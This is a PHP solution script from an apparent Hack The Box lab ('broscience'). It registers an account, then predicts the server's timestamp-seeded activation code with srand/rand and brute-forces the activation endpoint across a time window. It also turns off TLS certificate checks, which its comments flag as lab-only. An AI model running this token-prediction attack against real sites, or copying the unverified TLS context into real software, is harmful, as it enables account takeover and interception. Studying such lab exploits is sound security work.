CTF/HTB/broscience/rauser.php
Simon 82b0759f1e init htb
old htb folders
2023-08-29 21:53:22 +02:00


<?php
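// Lab exercise (HTB "broscience"): register a throwaway account and record the
// wall-clock second just before and just after the request. The rest of the
// script relies on those two timestamps to bracket the moment the server
// handled the registration.
$username = "user" . rand(1, 9999);
$email = $username . "@mail.com";
$password = "password";
$url = 'https://broscience.htb/register.php';

// Form body shape: username=user1&email=user1%40email.com&password=password&password-confirm=password
$data = array(
    'username' => $username,
    'email' => $email,
    'password' => $password,
    'password-confirm' => $password,
);
echo implode(" ", $data) . "\n";

// The 'http' wrapper key is used even when the request goes to https://...
// NOTE(review): verify_peer / verify_peer_name are switched off, so this
// context accepts any certificate and any host name. That is presumably here
// because the lab host serves a self-signed certificate; a context like this
// gives no protection against interception and should stay confined to the lab.
$options = array(
    "ssl" => array(
        "verify_peer" => false,
        "verify_peer_name" => false,
    ),
    'http' => array(
        'header' => "Content-type: application/x-www-form-urlencoded\r\n",
        'method' => 'POST',
        'content' => http_build_query($data),
    ),
);

$tstart = time();
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
$tend = time();

// file_get_contents() returns false when the request fails; without this check
// the script would carry on as if the registration had gone through.
if ($result === false) {
    echo "Registration request failed\n";
    exit(1);
}

// Parentheses make the subtraction explicit instead of leaning on the relative
// precedence of "-" and ".", which differs between PHP 7 and PHP 8.
echo $tend . " - " . $tstart . " = " . ($tend - $tstart) . "\n";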
/**
 * Reproduce the 32-character code that a generator seeded with $t emits.
 *
 * The generator is seeded with srand($t) and then asked for 32 indexes into a
 * 62-character alphabet, so the output is a pure function of $t: the same seed
 * always yields the same code. Note that srand() reseeds PHP's global
 * generator as a side effect.
 *
 * Defensive takeaway: a token built this way carries no more unpredictability
 * than its seed. When the seed is a Unix timestamp, the token can be recomputed
 * by anyone who knows roughly when it was issued. Tokens that gate account
 * actions should be drawn from a CSPRNG (random_bytes() / random_int()) and
 * should not depend on the clock.
 *
 * @param int $t Seed value; the caller passes Unix timestamps.
 * @return string 32 characters from [a-zA-Z0-9].
 */
function generate_activation_code($t)
{
    $alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
    $lastIndex = strlen($alphabet) - 1;

    srand($t);

    // One rand() call per output character, in order, so the draw sequence
    // after seeding is the same as a character-by-character concatenation.
    $picked = array();
    while (count($picked) < 32) {
        $picked[] = $alphabet[rand(0, $lastIndex)];
    }

    return implode("", $picked);
}
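/**
 * Ask the lab host's activation endpoint whether a candidate code is accepted.
 *
 * The decision is made purely on the response body: a body containing
 * "Invalid activation code." means rejection, anything else is treated as
 * acceptance.
 *
 * Previously a failed request (file_get_contents() returning false) fell
 * through to str_contains(), where false was coerced to an empty string, so a
 * network or HTTP error was reported as a successful activation. A failed
 * request now raises instead of being counted as a match.
 *
 * @param string $code Candidate activation code, appended to the query string as-is.
 * @return bool false when the server reports the code as invalid, true otherwise.
 * @throws RuntimeException when the HTTP request itself fails.
 */
function check($code)
{
    $url = "https://broscience.htb/activate.php?code=" . $code;

    // NOTE(review): certificate and host-name verification are disabled here,
    // presumably for the lab's self-signed certificate; this context accepts
    // any certificate and should stay confined to the lab.
    $options = array(
        "ssl" => array(
            "verify_peer" => false,
            "verify_peer_name" => false,
        ),
        'http' => array(
            'header' => "Content-type: application/x-www-form-urlencoded\r\n",
            'method' => 'GET',
        ),
    );

    $context = stream_context_create($options);
    $result = file_get_contents($url, false, $context);

    if ($result === false) {
        // A transport or HTTP-level failure says nothing about the code's validity.
        throw new RuntimeException("Activation request failed for " . $url);
    }

    return !str_contains($result, "Invalid activation code.");
}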
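// Walk through candidate seeds one second at a time. The window opens 5 seconds
// before the locally observed start of the registration request and closes
// 5 seconds after its observed end ($tend), allowing for clock skew between
// the two machines. Without an upper bound the loop would keep issuing
// requests indefinitely whenever no candidate is accepted.
echo $tstart . " -> ";
$tstart = $tstart - 5;
$lastSeed = $tend + 5;

$code = generate_activation_code($tstart);
while (!check($code)) {
    $tstart = $tstart + 1;
    if ($tstart > $lastSeed) {
        echo "no candidate accepted within the observed time window\n";
        exit(1);
    }
    $code = generate_activation_code($tstart);
}

// Seed that produced the accepted code, followed by the code itself.
echo $tstart . "\n";
echo $code;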
?>